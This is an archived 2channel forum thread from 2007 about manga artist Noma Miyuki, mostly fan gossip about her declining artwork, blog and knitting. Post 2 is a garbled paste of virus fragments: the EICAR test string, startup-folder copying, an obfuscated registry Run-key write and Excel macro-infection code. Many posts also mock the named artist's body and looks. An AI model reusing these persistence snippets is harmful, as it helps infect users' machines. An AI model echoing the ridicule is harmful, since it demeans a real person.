2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

野間美由紀18貫目

1 :花と名無しさん:2007/09/11(火) 22:18:08 ID:???0
前スレが落ちたので立てました。

前スレ
野間美由紀17貫目
http://anime2.2ch.net/test/read.cgi/gcomic/1166484637/


2 :花と名無しさん:2007/09/11(火) 22:38:38 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


3 :花と名無しさん:2007/09/11(火) 22:55:48 ID:???0
>>1

4 :花と名無しさん:2007/09/11(火) 23:20:05 ID:???O
スレ殺陣ありがとう。
作品としてはもう語ることないけど
文庫で最後の鼻息ブヒッな頃だし
やっぱりスレないとね。

5 :花と名無しさん:2007/09/12(水) 18:21:59 ID:???0
>>1乙女

950過ぎると落ちやすいのかな?

6 :花と名無しさん:2007/09/13(木) 18:54:32 ID:???0
レス数が980越えたら24時間以内に書き込みなければdat落ち=後方圧縮
意外に広まってないもんなんだなw

7 :花と名無しさん:2007/09/14(金) 07:59:43 ID:???0
>>6
そうなんだ。覚えとこ。

私たちには野間の最後を見届ける義務があるw

8 :花と名無しさん:2007/09/15(土) 08:43:17 ID:???0
まだ10レスも進まないなんてどんだけw

9 :花と名無しさん:2007/09/15(土) 12:58:39 ID:???O
あー文庫出たんだね。
書き下ろし部分チェックしてこよう。

10 :花と名無しさん:2007/09/15(土) 23:53:24 ID:???0
ムダなアフェリがない分楽天ブログの方が読みやすい。
ノマさん、あれだけアフェリ貼りまくって楽天ではそんなに買い物してないのね。

11 :花と名無しさん:2007/09/16(日) 17:23:24 ID:???O
パズル文庫17、18巻購入。
おまけまんが目当てでね。
17巻にあった昔の絵が可愛くてね…
今と比べると涙出てきた。
ほんと生き生きしているんだよ。
逆に今の秋田版の絵が凍りついていて
宣伝してるけど読む気がしない。
あと18巻に昔のアシスタント写真があって
顔を加工してのっぺらぼうにしてるの。
プライバシー保護とはいえ気持ち悪いわ。

12 :花と名無しさん:2007/09/19(水) 09:03:20 ID:???0
>>11
人の顔を加工してのっぺらぼうにするなんて失礼なことするぐらいなら
イラストでいいじゃん!・・・と思ったけど、描けないんだったw

13 :花と名無しさん:2007/09/19(水) 11:59:13 ID:???0
パズルの文庫2冊同時発売なんて白癬が早く縁切りたがってるのかと
思ってしまったよ

14 :花と名無しさん:2007/09/23(日) 09:54:01 ID:???O
もう、餌代(オヤツ代)を払いたくないんだろうな…

15 :花と名無しさん:2007/09/27(木) 10:30:59 ID:???0
ホシュ

16 :花と名無しさん:2007/09/28(金) 10:41:39 ID:???0
「美鳥が喋って・・・」
ちがうっ、あんなの美鳥じゃないー!
また一段と劣(ry)orz

17 :花と名無しさん:2007/09/29(土) 12:33:58 ID:???O
(爆)とか(笑)をいつまで使うのかなあ〜ノマタン

18 :花と名無しさん:2007/09/29(土) 14:00:36 ID:???0
キーが入力できるうちは

19 :花と名無しさん:2007/09/30(日) 16:03:13 ID:???O
痩せただの血圧が下がっただの言うが
ちゃんと数値を明記してほしい。
お尻のおできは恥ずかしげもなく書くのに。
使用前後の写真でも貼れば、
マイクロダイエットポチッも増えるんじゃない。

20 :花と名無しさん:2007/10/01(月) 00:47:47 ID:???0
血圧って200越えしてなかった??
だからきっと200を切ったとかそんなもんだと思う。

(数値勘違いしてるかも、だったらゴメン)

21 :花と名無しさん:2007/10/03(水) 17:51:32 ID:???0
体重も80切ったとかw

22 :花と名無しさん:2007/10/07(日) 09:15:10 ID:???0
さすがに飽きてきたな。
ヲチャにも飽きられる野間・・・漫画家としての終焉も近いかもw

23 :花と名無しさん:2007/10/08(月) 01:08:38 ID:W7SZ5u76O
昔は面白かったもん。今は絵も話もひどいしorz

24 :花と名無しさん:2007/10/08(月) 20:31:28 ID:???O
漫画家としてはとっくに末期だよね…
なんかもう、現状の生活レベルを維持するために取り敢えず漫画描きっぽいことやってますっつう感じ。
ネタにすらならない、なんの面白みもない漫画家になっちまったね


25 :花と名無しさん:2007/10/09(火) 02:31:06 ID:???0
最近のをたまに立ち読みする限り、新規ファンはつかないだろうなと思う

前からの読者も絵・内容の劣化やブログからにじみ出てる人間性に
嫌気がさして離れてってるだろうし・・完全に先細りじゃない?

26 :花と名無しさん:2007/10/09(火) 16:41:44 ID:???O
野間! 受賞作家になぜ罰ゲームを課すのだ!!

27 :花と名無しさん:2007/10/09(火) 21:35:09 ID:???0
なんなんだ、あの厨坊が編んだようなネズミ色のセーターは。

28 :花と名無しさん:2007/10/10(水) 10:17:52 ID:???0
ネズミセーターは誰が着るんだろ。プレゼント用は別なのよね?

29 :花と名無しさん:2007/10/10(水) 22:21:02 ID:???O
ノマタンの周囲の人たちは、この季節は一瞬たりとも気が抜けないな…
オカンアート爆撃警報レッドアラート

30 :花と名無しさん:2007/10/12(金) 03:57:28 ID:???0
パズルゲームハイスクール、25巻くらいまでは買ってたんだけど
途中から大人編、娘編の話ばかりで読むのをやめてしまった…。
(いくらなんでも看板に偽りありだろ、と思って)
太陽、月、星の私立高校三部作みたいなのは結構好きだったので
この人は学生の話の方が面白いような気がするんだけどなー。

31 :花と名無しさん:2007/10/12(金) 11:43:29 ID:???0
付録ほしさに久々にミスボニ買ってパズルゲーム読んだ。
驚いた顔、怒ってる顔、謎解き(というほどでもない)顔、その他の顔が全部同じ。
表情が全然ない。口ぽかーんな顔ばっかりだ。

32 :花と名無しさん:2007/10/14(日) 23:50:18 ID:???0
>>31
キャラはみんなバストアップで何のポーズもしてない、
背景もろくに描かれてないのも全部のコマ共通。
パラパラって感じで見るとマジで全ページ同じに見える。

どこ見ても絵的に変化がないって漫画読む方としては苦痛だ。
描くほうは嫌にならないのかと思う。

33 :花と名無しさん:2007/10/15(月) 00:31:25 ID:???O
散々言われてる事だけど、本人、漫画描くモチベーションまるでナシだよね。
かつては漫画を描く事が楽しかったりした時期もあったんだろうけど)多分



34 :花と名無しさん:2007/10/15(月) 17:46:33 ID:???0
野間たんは表紙を描けば終わりと思ってそう。

35 :花と名無しさん:2007/10/19(金) 12:36:31 ID:ofkQQ0xD0
のまたんがブーティはいたらヒヅメじゃん

36 :花と名無しさん:2007/10/19(金) 13:48:45 ID:???0
ブートゥだなw

37 :花と名無しさん:2007/10/19(金) 19:16:12 ID:???0
なに?ブタ?

38 :花と名無しさん:2007/10/19(金) 21:18:34 ID:???0
ノマーズブートゥキャンプ

39 :花と名無しさん:2007/10/19(金) 22:17:40 ID:???0
>>38
でかいズンドウにポトフを目一杯作って食べ続ける&七草粥に卵と肉を入れて食べる。
デザートはバターもち。

40 :花と名無しさん:2007/10/20(土) 00:31:22 ID:???0
爆撃されて喜ぶノマ友達なんているのか?
ルームシューズなんて履いてる人見たことないんだけど。

41 :花と名無しさん:2007/10/20(土) 09:24:07 ID:???0
あの書き方だと関東以外は
芋煮会をいつでも普通にやってるみたいだな。

42 :花と名無しさん:2007/10/20(土) 20:07:52 ID:???O
ノマタンが「漫画の資料集め…」と書くだけで、「また切り貼り写真集めだなっ」と思う。


43 :花と名無しさん:2007/10/21(日) 15:20:52 ID:???0
>>41
いちおうノマは<東北地方に親しい友人や親戚はいないので>と書いているけど、
山形県以外はそんなに 芋煮会はやらないんじゃないかな?と思う。
私は山形の隣の県だけど、過去1回だけ会社の有志でやったくらいだ。


44 :花と名無しさん:2007/10/21(日) 16:03:00 ID:???0
>>43
隣接する県の、山形に近いほうでは結構やったりする(宮城・福島あたりの県境)。

秋田・岩手・青森となると、同じ野外で大鍋使った煮物でも「芋煮」という名称じゃ
なくなる、って感じ。
そろそろ野外でなんかやるには厳しい季節になるしね。

45 :花と名無しさん:2007/10/23(火) 20:37:51 ID:???0
表紙の美鳥、左利きになってる。

46 :花と名無しさん:2007/10/26(金) 12:09:35 ID:???O
なんであんな婆ちゃん色でばっかり編むんだ。
リクエストに添えてないと思う。

47 :花と名無しさん:2007/10/26(金) 17:36:37 ID:???0
なんかバランス悪いよね。
色だけじゃなく・・・。
いい加減、モチーフ繋げるだけの子供だましみたいなの
やめればいいのに。

48 :花と名無しさん:2007/10/26(金) 17:47:27 ID:???0
全然 レーシーで乙女なカンジじゃないよなー。

Macの新しいOSをもう入手したそーだが
何でもかんでも新製品に飛びつくのな。
ある程度評判聞いてから こういう新製品って手出さない?

49 :花と名無しさん:2007/10/26(金) 18:20:52 ID:???0
まあ人柱と思えば・・・そこまで使いこなしてないかw

50 :花と名無しさん:2007/10/26(金) 19:13:31 ID:???0
新製品に飛びつくのはいいけど、
そもそも新しい機能が必要なのか?と小一時間。
いままでのだって全然使いこなせていないし。
というか、使いこなす必要のない漫画だし。

51 :花と名無しさん:2007/10/26(金) 23:01:22 ID:???0
新しいOSなんてバグとか不具合があったりするけど、
そういう時人一倍文句言いそうだから店の人がかわいそう

52 :花と名無しさん:2007/10/26(金) 23:20:27 ID:???0
人より先にバグを探したりするのが生き甲斐なんだから。
率先して人柱になる人。

53 :花と名無しさん:2007/10/27(土) 03:29:00 ID:???0
アイコンが平面的になるのがイヤって…
作品が平面的なのは気にならんのかいっ!

いくら新製品入手しても切り貼りに使うだけなんてもったいない

54 :花と名無しさん:2007/10/28(日) 11:42:35 ID:???O
まさに宝の持ち腐れ。徒に高スペックだったり、最新verソフト仕込んだりすんのって仕事のためじゃないよね。
ありゃただの趣味。仕事に使うんならバグ必至の最新版はフツーに怖いと思う。



55 :花と名無しさん:2007/10/29(月) 19:17:56 ID:???0
まあMacに限らずすぐ飛びつくのは知ったかぶりの素人が多いよ。
本当に必要で使いこなす人はちゃんと考えて買うもん。

56 :花と名無しさん:2007/10/30(火) 10:16:54 ID:???0
知ったか素人もだけど、野間たんの場合は
それプラス「新しいもの好き」だよね。


57 :花と名無しさん:2007/11/01(木) 12:04:16 ID:???0
レッグウォーマー・・・w
自分サイズに作るなよwwwww

58 :花と名無しさん:2007/11/01(木) 15:39:02 ID:???O
編み物…コンサバ
パソコン関係…プログレ
こういう概念てなんていうかまあ…。
ノマタンは編み物に関しては
かなり破壊的だと思うよ。

59 :花と名無しさん:2007/11/01(木) 16:33:20 ID:???0
友人たちはいつになったら
武装解除できるのかw

60 :花と名無しさん:2007/11/01(木) 18:48:05 ID:???0
ttp://headlines.yahoo.co.jp/hl?a=20071031-00000021-mai-soci
こんな話あったよね。漫画のほうは客が悪かったけど。

61 :花と名無しさん:2007/11/01(木) 19:02:25 ID:???0
あ〜ほんとだ。ジュエリーシリーズの第一話だ。
あのころはまだ面白かった。

62 :花と名無しさん:2007/11/04(日) 11:57:05 ID:???O
遅ればせながらノマタンの新作(漫画でない)見たよ。
編み目がどうこうっていうより配色がなんだかな〜。
本体の濃い赤基調の変わり色にモーブっぽいゴム編み部分がえらく浮いてる。
無難に縁は黒とかにすればいいと思うんだが。じゃなかったら始めから本体を薄めの色にするとかさあ。
とにかく、あのレッグウォーマー、私はいらん!

63 :花と名無しさん:2007/11/04(日) 12:54:00 ID:???0
手作りの物を貰う場合、センスよくって嬉しい場合はいいんだけど、
微妙〜や迷惑な場合のお礼をしなきゃならないのが辛い。
私もあのレッグウォーマーを貰ったら、罰ゲーム気分で憂鬱になりそう…



64 :花と名無しさん:2007/11/04(日) 14:31:25 ID:???0
恥ずかしながらファッションに疎いので質問だが、
レッグウォーマーって需要あるの?
周りでやってる人見た事ないんだけど。


ところで、オカンアート趣味の友人がサマーセーターを編んであげると言ってきた。
編み物が好きだから編むのであって、材料費だけもらえればOKって。
ちゃんとサイズ測って、アナタの体型にあったの編むから素敵よぉ〜って。
店頭で色々見て買う方が好きだし、本当は断りたかったけど
断る理由がうまく思い浮かばなくて、結局お願いした。
材料費、1万円も取られて出来上がったのは普通にTシャツの形・・・_(\○_
お願いだから趣味は趣味の範囲で、周りを巻き込まないで欲しい。


65 :花と名無しさん:2007/11/04(日) 19:07:34 ID:???0
>>64
1万円も取られてそれでは…可哀相だ。
まだ勝手に作ったものをプレゼントされて、お礼する方がましだね。
お菓子でも買ってさ「ありがとう」ってね。

私なら何とかして断る。
64さんも次回からは断れるといいね。

66 :花と名無しさん:2007/11/04(日) 20:22:40 ID:???0
>>64
寒冷地の屋内では、あるとそれなりにありがたい。>レッグウォーマー

新築のうちとかマンションなんかは断熱・保温効果が高くなったところが
多いけど、古い一軒家とかは、ほんっとに冬の足元が冷える。
外ではあんまり履かない人が多いけど(流行遅れのルーズソックスに
見られたりしてもイヤだし)。

ただなー、ノマテンテの場合、東京住まいだしぬくいお部屋で編物してる
だろうし、寒いところがどんなもんなのか、実感はないと思うんだよなー。
ブログにのっけてる写真を見た限りでは、オサレ目的に使うのにはアレだし、
かといってあんまりあったかそうにも思えないし……いろんな意味で微妙。

67 :花と名無しさん:2007/11/05(月) 07:01:38 ID:???0
そろそろ年賀状の季節ですが・・・
今年は何をパクるつもりかすぃら?w

68 :花と名無しさん:2007/11/07(水) 14:22:40 ID:???O
毎年、漫画よりも100倍は心血を注いでいる、と言われる年賀状ですね。
わ〜見た〜い)棒

69 :花と名無しさん:2007/11/07(水) 23:12:32 ID:???0
ジュエリーBOX3購入しました。
パズルはちょっとすたれているけれど、ジュエリーは良かったな。

70 :花と名無しさん:2007/11/08(木) 17:36:50 ID:???0
これだけ編み物のキャリア(プ)があるのに
左右同じサイズで編めないというのは
そりゃただ単にへt(ry

71 :花と名無しさん:2007/11/09(金) 22:22:30 ID:???0
のまたんってゲージ編まないのかな?

72 :花と名無しさん:2007/11/09(金) 22:44:37 ID:???0
上級者は編む手の力みたいなのが決まってるから、
だいたいいつも一定のサイズで編めるからねえ…。

ノマたんは自分では上級者だと思ってるんだろうなー。

73 :花と名無しさん:2007/11/10(土) 19:14:15 ID:???O
野間にサインなんて求めないから安心しろ。
痩せたかどうか見てみたいけど。
きっと群集の中でもすぐ判るけど
近寄りたくはないタイプなんだろうな。

74 :花と名無しさん:2007/11/10(土) 21:01:42 ID:???0
生の野間さんを見たい気もするし、
私の好きな推理作家にも会いたいので、
明日立教大学に行く予定です。
早起きしなくては。

75 :花と名無しさん:2007/11/10(土) 22:33:10 ID:???0
行きたいけど東京は遠い・゚・(ノД`)
レポよろしくー。

76 :花と名無しさん:2007/11/11(日) 12:00:19 ID:???0
おいおい、作家がたくさん来てるからサインはNGってのは分かるが

 な  の  で

私もサインはNGですって意味が分からんw
おまいはただの落ちぶれた漫画家だろうが。


77 :花と名無しさん:2007/11/11(日) 12:21:24 ID:???0
写真を撮る勇者はおらんのか?

78 :花と名無しさん:2007/11/11(日) 13:05:18 ID:???0
被爆しとおない。

79 :花と名無しさん:2007/11/11(日) 14:38:50 ID:???0
この書き込み、まんま野間たんに当てはまってワロタw



947 :可愛い奥様 [sage] :2007/11/11(日) 14:23:31 ID:YHugfZqu0
林真理子、死ぬ気で痩せればいいのに…
この人が痩せてたところ、見たこと無い
「てめえが恋愛語るな」って言われ続ける屈辱より
いいもん食いまくる方を選ぶのか。


80 :花と名無しさん:2007/11/11(日) 22:22:08 ID:???0
>>76
入札数0だったりしてw
それともパンジーが落札するのかな。

81 :74:2007/11/11(日) 22:49:42 ID:???0
立教大学行ってきました〜

普段会えない作家の方々のトークを拝聴しておりましたら、
野間さんには会えませんでした。
私にとっては大作家先生方>野間さん でした(^^;

オークションに行けば会えたのかもしれないけれど・・・。

82 :花と名無しさん:2007/11/12(月) 17:59:48 ID:???O
好きな作家さんに会えて良かったね。

野間たん60代のババアに見える。

83 :花と名無しさん:2007/11/12(月) 19:08:24 ID:???0
たしかに、口から下しか見えてないのに、すごくふけて見える。


84 :花と名無しさん:2007/11/12(月) 20:05:58 ID:???0
おっ、今回の模様は結構いい?と思ったのもつかのま。
その下の写真を見ると・・・まるで赤ずきん・・・

85 :花と名無しさん:2007/11/12(月) 20:57:14 ID:???O
ほっぺのお肉がブルちゃんのよう…

ところでああいったウォーマーって、プレゼントとして需要はあるんだろうか…
自分がアレもらったらビミョーな気分になりそう

86 :花と名無しさん:2007/11/12(月) 21:27:32 ID:???0
あの顔の肉、ぜんぜん痩せてないんジャw

87 :花と名無しさん:2007/11/12(月) 22:17:56 ID:???0
なんだか・・・顔面セルライトっぽくない???


88 :花と名無しさん:2007/11/12(月) 22:21:52 ID:???0
>>85
いっそのこと、シックな単色の方が需要はあると思う。

89 :花と名無しさん:2007/11/13(火) 08:56:03 ID:???0
推理作家協会の名簿にある写真は目も穏やかですっきりして見える
実際はどうなのかしら?

そういえば恩田陸さんや柴田よしきさんにちょっと似てない?

90 :花と名無しさん:2007/11/13(火) 18:08:32 ID:???0
一応20年以上キャリアのある漫画家なんだからさぁ、
あんな子供が描くような顔だけのイラスト色紙じゃなくて、
もうちょっと漫画家らしい絵が描けんのかねぇ〜(溜息
そして、
野間タンが色紙の左上で座布団に座っている件w

91 :花と名無しさん:2007/11/13(火) 18:17:17 ID:???0
ブログの、カレンダーの真下にある「Twitter Balloon」ってやつ、
どーゆー仕組みかイマイチわからないけど、ノマたんの日記から
単語拾い出してしゃべらせるシステムなんだね。

一応絵だけは落ち着いた大人の女性のイラストなのに、しゃべるのが
「今日は石狩鍋」だの「きんぴらサンドうまかった」だの………
(下の小さな[<<]をクリックすると、過去の発言が見られる)

92 :花と名無しさん:2007/11/13(火) 20:38:38 ID:???0
この画像の隣にノマ写真を並べてほしいw
http://up2.viploader.net/upphp/src/vlphp090182.jpg

93 :花と名無しさん:2007/11/14(水) 09:31:39 ID:???0
似てると思うけどひどい組み合わせ

94 :花と名無しさん:2007/11/14(水) 13:52:32 ID:???0
仕事に対する誠意wwwwwwwwww

95 :花と名無しさん:2007/11/17(土) 12:52:10 ID:???O
すげ〜なに、あれ、あの指輪食い込み画像
あの画像と体験文でアフェリ稼げるとでも思ってるのだろうか…いやそれ逆効果のような気が

96 :花と名無しさん:2007/11/17(土) 13:20:24 ID:???0
>>95
見てきた。
指のボンレスっぷりよりも
よくあんな老婆みたいな手を晒せるもんだと思った。
私だったら絶対うpしない。
指輪を見て欲しいなら、無地の布をクルクル巻いて嵌め込むとか
それなりに指輪をキレイに見せる工夫をする。
あれじゃあ指輪が可哀相だ。

97 :花と名無しさん:2007/11/17(土) 13:45:53 ID:???0
指輪がつらそう><

98 :花と名無しさん:2007/11/17(土) 16:25:15 ID:???O
指輪のおサイズwはどの位でしょうか

99 :花と名無しさん:2007/11/17(土) 18:29:05 ID:???0
18号とかじゃなかったっけ?

100 :花と名無しさん:2007/11/17(土) 22:12:50 ID:???O
描きかけの香月がカッパのようだ…
そしてノマタンの手はやっぱりアップに耐えない

101 :花と名無しさん:2007/11/18(日) 10:20:10 ID:???0
クマがペンを持ってるみたいだ。

102 :花と名無しさん:2007/11/18(日) 20:38:06 ID:???0
ttp://wwkt.exblog.jp/6588989/#6588989_1

これなら贈られたらうれしいなぁ。

103 :花と名無しさん:2007/11/19(月) 20:12:18 ID:???0
>102
技術の差が歴然だね。
でも正直ネックヲーマーって要らないやw

104 :花と名無しさん:2007/11/19(月) 23:04:50 ID:???O
ノマタンがグダグダと、ハードだのソフトだのツールだのの話をブログに書いているのを読むたびに、
どうでもいいから、お前は手で描け、手で!と、思ってしまう…



105 :花と名無しさん:2007/11/19(月) 23:41:47 ID:???0
>>102
あれ?着用時の首周りの余裕に、随分差がありますね。

106 :花と名無しさん:2007/11/20(火) 18:00:30 ID:???0
>>104

×手
○足

107 :花と名無しさん:2007/11/21(水) 21:29:26 ID:???0
スレ見つけて語り合えるかと思ったら、けなし合うスレだったのですね。。。orz

108 :花と名無しさん:2007/11/22(木) 08:00:43 ID:???0
>>107

昔々あるところに漫画をこよなく愛する少女・雪子(仮名)がおりますた。
雪子は特に「パズルゲームはいすくーる」がお気に入りで、
こんな素敵な漫画を描く先生を尊敬し、憧れておりますた。
部活や受験に追われ、いつしか漫画から遠ざかっていた雪子でしたが、
大人になり、恋をして結婚し、時間に余裕ができるようになり、
ある日、入った書店でふとみつけた「パズルゲームはいすくーる」の文字。
雪子は迷わずコミックスを購入したました。
まるで初恋の彼に再会したような、
恥ずかしいけど嬉しいドキドキした気持ちでページをめくると
そこにあったのは、氷のように冷たい
表情もなければ動きもない、瞳孔の開いた香月がいました。
大地がいました。卓馬がいました。
そして、あんなにも可愛くて大好きだった美女は
金属タワシヘアーになっていました。
野間先生に何があったんだろう・・・。
調度その頃、パソコンを始めた雪子は
検索サイトで「野間美由紀」と、尊敬する漫画家の名を打ち込み
Rose Gardenという公式サイトがあることを知りました。



だいたい↑こんな経緯の後
野間に対して、漫画家よりヲチの対象としての才能を見出した人が
このスレには多いと思われます。
普通に考えてみ?
野間レベルの漫画家でスレ18まで普通は行かんよw

109 :花と名無しさん:2007/11/22(木) 15:27:44 ID:???0
>>107
語り合ってますが何か?w


110 :花と名無しさん:2007/11/22(木) 15:48:44 ID:???0
雑誌で美女が「美人」って紹介されているのがすごく謎だったけど、
そうか、最初は可愛かったのか…
今の絵しか知らない私には想像できないや。

111 :花と名無しさん:2007/11/22(木) 16:31:40 ID:???O
美女とか伊藤みいなとか
今みたいに線がかたいと
全く可愛くないんだよね。
宗間が教室荒らした話に出てきた
中学時代の美女は可愛かったな。

112 :花と名無しさん:2007/11/22(木) 17:42:52 ID:???0
一応、名前があんなで(実際に美人でもあったけど)
容姿のことばかり言われるからコンプレックスになって
メガネかけてる、って設定だったっけ>美女

113 :花と名無しさん:2007/11/22(木) 19:48:05 ID:???O
美女がメガネかけたのは、
宗間が美女と付き合った理由は
自分と釣り合う容姿だからと
フフンてな態度で言われ傷ついたから。

114 :花と名無しさん:2007/11/22(木) 21:00:20 ID:???0
ネックウオーマーもらうんなら、エコたわしの方がいいやw

115 :花と名無しさん:2007/11/23(金) 12:50:57 ID:???0
貰ったネックウォーマーを丸めてエコたわしに。

116 :花と名無しさん:2007/11/23(金) 22:06:50 ID:???0
お湯が出ないと外食になるって・・・そういうものなのかのう

117 :花と名無しさん:2007/11/24(土) 07:32:06 ID:???0
そんな理由でご飯作らなくていいなら
今からウチの給湯器壊します。

確かにこの季節 水は辛いけどゴム手袋すれば?
洗い物の少ないものを作るとかさ……。

118 :花と名無しさん:2007/11/24(土) 10:22:30 ID:???0
誰よりも肉厚な手をしているのにw

119 :花と名無しさん:2007/11/24(土) 13:37:48 ID:???0
まぁ外食はいいとしても、
祝祭日は料金が3割り増しって言ったって万単位で高いわけじゃなかろうに。
野間たんってお金使うべき所と無駄遣いってのが分かってないな〜って思う。

120 :花と名無しさん:2007/11/24(土) 14:36:16 ID:???0
サービスはタダと思ってるんだろうね。

121 :花と名無しさん:2007/11/24(土) 20:39:22 ID:???O
暖房もダメだったのか。
なら外食も納得できるね、一応。
けどお風呂なしでいいってさすが漫画家だな。
暖房、給湯器、風呂だめなら
まずスーパー銭湯に行くなあ。

122 :花と名無しさん:2007/11/26(月) 08:46:23 ID:???0
渾身の力で丁寧に描いた絵が、どれだけクオリティが高いのか
怖いもの見たさで見てみたいw

123 :花と名無しさん:2007/11/26(月) 10:46:03 ID:???0
慢心の力作じゃないの?

124 :花と名無しさん:2007/11/26(月) 17:56:08 ID:???O
銀座松屋ワコールのバーゲンにノマタン来場予告。
お近くの方、被爆しないよう逃げてー。

125 :花と名無しさん:2007/11/26(月) 18:58:05 ID:???0
>>119
外食代>>>>休日料金 だったらわろすw

126 :花と名無しさん:2007/11/26(月) 21:45:28 ID:???0
>>122
気にするな。どうせ自作ケーキの写真トレースだから
そのうちケーキの写真が見られるってwww

127 :花と名無しさん:2007/11/26(月) 23:13:51 ID:???0
………リンゴ、バターで炒める(ような状態にする)のか……

砂糖かるくまぶしてナベに入れて弱火にかけておけば、
リンゴの水分だけで煮えるのにな。
カトルカールって生地にバターたくさん使うから、混ぜるもんは
さっぱりさせた方がいいのに(小さく刻めば生のまま入れても
いいくらいだ)。

128 :花と名無しさん:2007/11/27(火) 08:09:01 ID:???0
>>127
あのバター餅の人ですよ?
そんなんで満足できると思います?
むねやけしないデザートはデザートぢゃない!


129 :花と名無しさん:2007/11/27(火) 22:36:08 ID:???O
ノマタンがどんなブラしてるかなんて
どんなマニアが喜ぶ情報なんだよ。

130 :花と名無しさん:2007/11/30(金) 20:28:45 ID:???O
妻手編みのマフラーは欲しがらない野間旦那…そりゃそうだよな、と納得。

131 :花と名無しさん:2007/12/03(月) 12:02:11 ID:???0
しましまマフラー、野間にしてはマトモな作品だと思う。

132 :花と名無しさん:2007/12/03(月) 14:54:19 ID:???O
あのポンチョ着て免許更新いったのか。
ポンチョはおしゃれアイテムだけど
ノマタンが着るところ想像すると
道端でオカリナ売ってる人みたいで…。
あとドンタコス風の人。

133 :花と名無しさん:2007/12/03(月) 15:16:33 ID:???0
ポンチョ、アグリーベティを思い出したw

134 :花と名無しさん:2007/12/04(火) 15:05:32 ID:???O
ドンタコスwww
目に浮かぶwww

135 :花と名無しさん:2007/12/04(火) 15:07:19 ID:???0
アンデス系ですな

27 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)